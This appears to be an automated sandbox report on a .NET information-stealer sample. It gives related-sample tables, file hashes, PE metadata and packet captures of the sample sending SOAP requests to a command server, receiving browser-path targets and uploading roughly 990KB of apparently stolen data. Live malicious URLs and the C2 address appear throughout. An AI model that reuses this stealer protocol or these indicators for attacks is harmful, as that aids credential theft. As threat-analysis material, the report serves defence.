	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.82.174
	https://zfrmz.com/mH78Gmbnl9SICcogz2hN	Get hash	malicious	HTMLPhisher	Browse	104.21.39.212
	eInvoice.html	Get hash	malicious	HTMLPhisher	Browse	104.21.68.220
	Document.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.6
	https://hmrc.imicampaign.uk/seeemailinfull/EmailServlet?campaignkw=notrack&tid=cc-0_1732616321656385551&signature=B8C7164A14962A622D435A3DBF774C01	Get hash	malicious	Unknown	Browse	104.19.229.21
CLOUDFLARENETUS	HQV-224647.docx	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://prod.jaspir.com/biowa/	Get hash	malicious	Unknown	Browse	172.64.150.216
	https://citiscapegroupae-my.sharepoint.com/:li:/g/personal/asekhar_citiscapegroup_com/E9U24ACMrctKoLKfReMWVjMBfxodtw3c4oUIHo4oyReVhg?e=SgIv5D&xsdata=MDV8MDJ8ZGVyZWsuZGVscG9ydEBvbnRoZWRvdC5jby56YXw5ZWEzNzFkNDdmNTM0YzE2Yjg5YTA4ZGQwZTAwZjY1OXwxMGRjN2M5NjU5NzY0NjAxODgyYzlhYzdjMjg3MGVjY3wxfDB8NjM4NjgyMTE5NTE1MDk3NDExfFVua25vd258VFdGcGJHWnNiM2Q4ZXlKRmJYQjBlVTFoY0draU9uUnlkV1VzSWxZaU9pSXdMakF1TURBd01DSXNJbEFpT2lKWGFXNHpNaUlzSWtGT0lqb2lUV0ZwYkNJc0lsZFVJam95ZlE9PXwwfHx8&sdata=S3JqYzUxeUd4SmtWMEVWUzBMU3JUREpWTEJiN3VmeFVrY09ucElOZDRzaz0%3d	Get hash	malicious	Unknown	Browse	1.1.1.1
	tmpE43E.htm	Get hash	malicious	Unknown	Browse	104.18.27.193
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.82.174
	https://zfrmz.com/mH78Gmbnl9SICcogz2hN	Get hash	malicious	HTMLPhisher	Browse	104.21.39.212
	eInvoice.html	Get hash	malicious	HTMLPhisher	Browse	104.21.68.220
	Document.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.6
	https://hmrc.imicampaign.uk/seeemailinfull/EmailServlet?campaignkw=notrack&tid=cc-0_1732616321656385551&signature=B8C7164A14962A622D435A3DBF774C01	Get hash	malicious	Unknown	Browse	104.19.229.21
CLOUDFLARENETUS	HQV-224647.docx	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://prod.jaspir.com/biowa/	Get hash	malicious	Unknown	Browse	172.64.150.216
	https://citiscapegroupae-my.sharepoint.com/:li:/g/personal/asekhar_citiscapegroup_com/E9U24ACMrctKoLKfReMWVjMBfxodtw3c4oUIHo4oyReVhg?e=SgIv5D&xsdata=MDV8MDJ8ZGVyZWsuZGVscG9ydEBvbnRoZWRvdC5jby56YXw5ZWEzNzFkNDdmNTM0YzE2Yjg5YTA4ZGQwZTAwZjY1OXwxMGRjN2M5NjU5NzY0NjAxODgyYzlhYzdjMjg3MGVjY3wxfDB8NjM4NjgyMTE5NTE1MDk3NDExfFVua25vd258VFdGcGJHWnNiM2Q4ZXlKRmJYQjBlVTFoY0draU9uUnlkV1VzSWxZaU9pSXdMakF1TURBd01DSXNJbEFpT2lKWGFXNHpNaUlzSWtGT0lqb2lUV0ZwYkNJc0lsZFVJam95ZlE9PXwwfHx8&sdata=S3JqYzUxeUd4SmtWMEVWUzBMU3JUREpWTEJiN3VmeFVrY09ucElOZDRzaz0%3d	Get hash	malicious	Unknown	Browse	1.1.1.1
	tmpE43E.htm	Get hash	malicious	Unknown	Browse	104.18.27.193
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.82.174
	https://zfrmz.com/mH78Gmbnl9SICcogz2hN	Get hash	malicious	HTMLPhisher	Browse	104.21.39.212
	eInvoice.html	Get hash	malicious	HTMLPhisher	Browse	104.21.68.220
	Document.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.6
	https://hmrc.imicampaign.uk/seeemailinfull/EmailServlet?campaignkw=notrack&tid=cc-0_1732616321656385551&signature=B8C7164A14962A622D435A3DBF774C01	Get hash	malicious	Unknown	Browse	104.19.229.21
TUT-ASUS	Client.exe	Get hash	malicious	Quasar	Browse	208.95.112.1
	file.exe	Get hash	malicious	PureCrypter, Amadey, Cerbfyne Stealer, Credential Flusher, Cryptbot, LummaC Stealer, Poverty Stealer	Browse	208.95.112.1
	file.exe	Get hash	malicious	Cerbfyne Stealer	Browse	208.95.112.1
	file.exe	Get hash	malicious	Cerbfyne Stealer	Browse	208.95.112.1
	oIGNK22EVW.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	5WTfUvmHO0.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	4sN88dMzwC.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	JEr70NrBvQ.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	8wLgIg588m.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	DmI602ZFyp.exe	Get hash	malicious	Unknown	Browse	208.95.112.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.67.196.114 162.159.136.232
	SERV27THNOVSCANNEDcopiesACCOUNT-SUMMARYcon3-2.vbs	Get hash	malicious	GuLoader, Remcos	Browse	172.67.196.114 162.159.136.232
	awb_shipping_post_27112024224782020031808174CN27112024000001124.vbs	Get hash	malicious	GuLoader, Remcos	Browse	172.67.196.114 162.159.136.232
	pay.bat	Get hash	malicious	Kimsuky	Browse	172.67.196.114 162.159.136.232
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.67.196.114 162.159.136.232
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.67.196.114 162.159.136.232
	Po-5865A.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.196.114 162.159.136.232
	https://www.gogetsy.com/downloads/eyJmaWxlX2lkIjoiMTIwMDY1NzY3MjE3NSIsInRyYW5zYWN0aW9uX2lkIjoiMzgyNDQ4NTYwOSIsImV2ZW50IjoiZG93bmxvYWQiLCJub25jZSI6IjY3M2NlODI0MTU2ZGQ2NzNjZTgyNDE1NmRmNjczY2U4MjQxNTZlMDY3M2NlODI0MTU2ZTEiLCJ0aW1lc3RhbXAiOjE3MzIwNDQ4MzZ9/0ff3c9f2d9eae28f5e9880589ecb55882049889393d1e096fca15f339c17e418	Get hash	malicious	Unknown	Browse	172.67.196.114 162.159.136.232
	ZipRipper.cmd	Get hash	malicious	Unknown	Browse	172.67.196.114 162.159.136.232
	CUVAs_ Closing Doc_ The Abram Law Group #RDZ-01.eml	Get hash	malicious	CredentialStealer, HTMLPhisher	Browse	172.67.196.114 162.159.136.232

Process:	C:\Users\user\AppData\Roaming\svchost.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	194846
Entropy (8bit):	7.875274913239464
Encrypted:	false
SSDEEP:	3072:fLhqq1T06cFcjsIjlM4AHrZtUAms0Q1NEAhL6knc:WFcjsIjlLgDHEML6knc
MD5:	A277AE6A943DE33122566536C90DE87D
SHA1:	A760F1C75AEF3493AA8126CAEF905AC9E01B7720
SHA-256:	8424171481DB287788B034E5C9FFA30DF56B1CC4E9AF0CCEBF2D1D155D97FA2C
SHA-512:	339ED7B537810B6AD78007A7C06D6CE09B32ACFE5CAD0008AE462825369223ACC58D7BED104F9F008D9A1F492828B1A4F5D97D28A4EBDC0DA02598B5CD38C654
Malicious:	false
Preview:	PK........32{Y..............$.Browsers/.. ...........+..@....+..@....+..@..PK........32{Y..............$.Browsers/Google/.. ...........+..@....+..@....+..@..PK........32{Y..............$.Directories/.. ..........G..@...G..@....B..@..PK........32{Yt..[....5.....$.Directories/Desktop.txt.. ..........SE..@...SE..@...SE..@..}S.n.0.=S...K..Nb;&..$v.q...P.DU.~}k.I`..=J..u..._>>.y....{M.d}X..H.e.e.)J.._.$...Z....r.$..).f9../n.7Y.!..%....V.$/L...vG.:2&M...a3&....{&........Jk.q.n.$.Q.qs[..t.S.;.....-...LU..:...=.83.i^.0iuAUI.......O.....i.7N.J.J.$.T..:.4f.A....dyObp..#.)dSr..qB..8.O.....:l.)..(?gU..c0...E.Z...~..(....d........Q...d.;.......{.P.q..h.Xt'...np....E..P...s.h...`...;u..t.?PK........32{Y.............$.Directories/Documents.txt.. ..........SE..@...SE..@...SE..@..m... .....>.7}..D..@...7..vl..Ig..-.D...s.~.............v....0H..Z.^.>l.%.D..7\..N..QTRH.]....'Q..H....7...i0.R....]5cqV.....<..R.T~.....J.Z.....,xh..?.>O*.,.j.....iS#!..8.N.$g.k...X...

Process:	C:\Users\user\Desktop\VzhY4BcvBH.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1727
Entropy (8bit):	5.3718223239563105
Encrypted:	false
SSDEEP:	48:MxHKQwYHKGSI6o6+vxp3/elZHNpOtHTHhAHKKkt1qHGIs0HKD:iqbYqGSI6o9Zp/elZtpOtzHeqKktwmjB
MD5:	9714380A7DC1A8945C07B6C9DC8312B0
SHA1:	E6DF51F4C72B17485883378FDBF28D6BB5CFFDF3
SHA-256:	1DD30FC94BA3D3F97B5F250110A2639430AEB51FAE7A252F886AE2401EC31D4B
SHA-512:	876FB2C042F5FC60F6ACE9D143BA1A3AC9E200124EA3CB12476D10D24D82B4F2394F045E56FEB8906872D01B00BF9E646DEECC384144E21AEB6D6C10A365FB10
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.799452236184849
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	VzhY4BcvBH.exe
File size:	95'744 bytes
MD5:	1d3961a5c49f14f107e4cee038d45fd0
SHA1:	beebd3db77e5a5b91336447791a8a0abcbed9ad6
SHA256:	edf2ccaca8d236e6cb3ba9e98c9171c52a23545489bcd756cd47b2eb11baeaba
SHA512:	47037e6a9652148f6e15db0572e4989bde1e811732dc6bd4358ed868696b7ad39fb0fe572f74ab1b1eab96b8b70e9c0e775640c04ad888d3023f20dd0ebd7bd5
SSDEEP:	1536:aaewCXifh+t5dfmrsT7ezGFeSnBad8pKJHFr7mkgiBgi08FilaebKT10IfLJFDYx:aamyZSdfmrsT7aoM8UHmvied8U4e+6EQ
TLSH:	6B93014087E68B1ADAFE9FB50C31B213DB36E707BC13EF7D0888D15568736A849601B6
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Wc;g.................l............... ........@.. ....................................@................................

Entrypoint:	0x4189fe
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x673B6357 [Mon Nov 18 15:55:03 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x189b0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1a000	0x4d8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1c000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x16a04	0x16c00	38e5f180e128844ba5e5ec469de7d51b	False	0.9303528502747253	data	7.863903568154598	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x1a000	0x4d8	0x600	4e6b6f000f4bdfe88806559cc79afd09	False	0.3743489583333333	data	3.7248417862817034	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x1c000	0xc	0x200	977abcaec7f4c004599db85e80b364d6	False	0.041015625	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x1a0a0	0x244	data			0.4724137931034483
RT_MANIFEST	0x1a2e8	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 27, 2024 12:16:58.634777069 CET	65462	53	192.168.2.5	1.1.1.1
Nov 27, 2024 12:16:58.772464991 CET	53	65462	1.1.1.1	192.168.2.5
Nov 27, 2024 12:17:15.980474949 CET	63196	53	192.168.2.5	1.1.1.1
Nov 27, 2024 12:17:30.810574055 CET	58710	53	192.168.2.5	1.1.1.1
Nov 27, 2024 12:17:43.058715105 CET	57187	53	192.168.2.5	1.1.1.1
Nov 27, 2024 12:17:43.199242115 CET	53	57187	1.1.1.1	192.168.2.5
Nov 27, 2024 12:17:44.481893063 CET	55635	53	192.168.2.5	1.1.1.1
Nov 27, 2024 12:17:44.619786978 CET	53	55635	1.1.1.1	192.168.2.5
Nov 27, 2024 12:17:44.716219902 CET	50733	53	192.168.2.5	1.1.1.1
Nov 27, 2024 12:17:44.855259895 CET	53	50733	1.1.1.1	192.168.2.5
Nov 27, 2024 12:17:46.788933039 CET	59584	53	192.168.2.5	1.1.1.1
Nov 27, 2024 12:17:47.124599934 CET	53	59584	1.1.1.1	192.168.2.5
Nov 27, 2024 12:17:49.946830034 CET	65187	53	192.168.2.5	1.1.1.1
Nov 27, 2024 12:17:50.084392071 CET	53	65187	1.1.1.1	192.168.2.5

Timestamp	Bytes transferred	Direction	Data
Nov 27, 2024 12:16:58.901943922 CET	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Nov 27, 2024 12:17:00.061399937 CET	175	IN	HTTP/1.1 200 OK Date: Wed, 27 Nov 2024 11:16:59 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

Timestamp	Bytes transferred	Direction	Data
Nov 27, 2024 12:17:09.172862053 CET	240	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" Host: 212.87.215.19:37552 Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Nov 27, 2024 12:17:10.422812939 CET	359	IN	HTTP/1.1 200 OK Content-Length: 212 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Wed, 27 Nov 2024 11:17:10 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Nov 27, 2024 12:17:15.489429951 CET	223	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" Host: 212.87.215.19:37552 Content-Length: 144 Expect: 100-continue Accept-Encoding: gzip, deflate
Nov 27, 2024 12:17:15.915054083 CET	1236	IN	HTTP/1.1 200 OK Content-Length: 4961 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Wed, 27 Nov 2024 11:17:15 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED] Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>195.74.76.223</b:string><b:string>69.55.5.249</b:string><b:string>193.226.177.40</b:string><b:string>111.7.100.42</b:string><b:string>199.203.206.147</b:string><b:string>84.57.190.252</b:string></a:BlockedIP><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:str [TRUNCATED]

Timestamp	Bytes transferred	Direction	Data
Nov 27, 2024 12:17:21.093781948 CET	221	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" Host: 212.87.215.19:37552 Content-Length: 993488 Expect: 100-continue Accept-Encoding: gzip, deflate
Nov 27, 2024 12:17:23.833569050 CET	294	IN	HTTP/1.1 200 OK Content-Length: 147 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Wed, 27 Nov 2024 11:17:23 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Timestamp	Bytes transferred	Direction	Data
Nov 27, 2024 12:17:23.957259893 CET	241	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" Host: 212.87.215.19:37552 Content-Length: 993480 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Nov 27, 2024 12:17:26.688982010 CET	408	IN	HTTP/1.1 200 OK Content-Length: 261 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Wed, 27 Nov 2024 11:17:26 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>

Timestamp	Bytes transferred	Direction	Data
Nov 27, 2024 12:17:43.329406023 CET	63	OUT	GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
Nov 27, 2024 12:17:44.471714973 CET	534	IN	HTTP/1.1 200 OK Date: Wed, 27 Nov 2024 11:17:44 GMT Content-Type: text/plain Content-Length: 12 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=MTYGuHDer20nRN4u1zKK_5z6bvIX0sCqbFOFYP.EdPc-1732706264-1.0.1.1-g66Kf.8diPIOajid5e15ffTJzMMcIq9ucAiKCjA7ELxwLu1LhcZLQhFkT0CQPbUaRtKavcu.oCgB9XS7PsluhA; path=/; expires=Wed, 27-Nov-24 11:47:44 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 8e91b6a7d9084299-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 38 2e 34 36 2e 31 32 33 2e 37 35 0a Data Ascii: 8.46.123.75
Nov 27, 2024 12:17:46.410787106 CET	39	OUT	GET / HTTP/1.1 Host: icanhazip.com
Nov 27, 2024 12:17:46.740739107 CET	534	IN	HTTP/1.1 200 OK Date: Wed, 27 Nov 2024 11:17:46 GMT Content-Type: text/plain Content-Length: 12 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=7.yyzk0LQJmMjYdTvKDujmB9cX3Tk87MUcNU9YKr23s-1732706266-1.0.1.1-7misTBl11HZRDTafUu1kqKFcc_.FywPpxs0zSdxv5iBrgkm0DAci2Q6aDVVA1y6P9JcGL6dHMFqt4r6jWpGGcw; path=/; expires=Wed, 27-Nov-24 11:47:46 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 8e91b6b61ad64299-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 38 2e 34 36 2e 31 32 33 2e 37 35 0a Data Ascii: 8.46.123.75

Timestamp	Bytes transferred	Direction	Data
Nov 27, 2024 12:17:44.979338884 CET	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Nov 27, 2024 12:17:46.079515934 CET	175	IN	HTTP/1.1 200 OK Date: Wed, 27 Nov 2024 11:17:45 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 13 X-Rl: 43 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

Timestamp	Bytes transferred	Direction	Data
2024-11-27 11:17:48 UTC	112	OUT	GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1 Host: api.mylnikov.org Connection: Keep-Alive
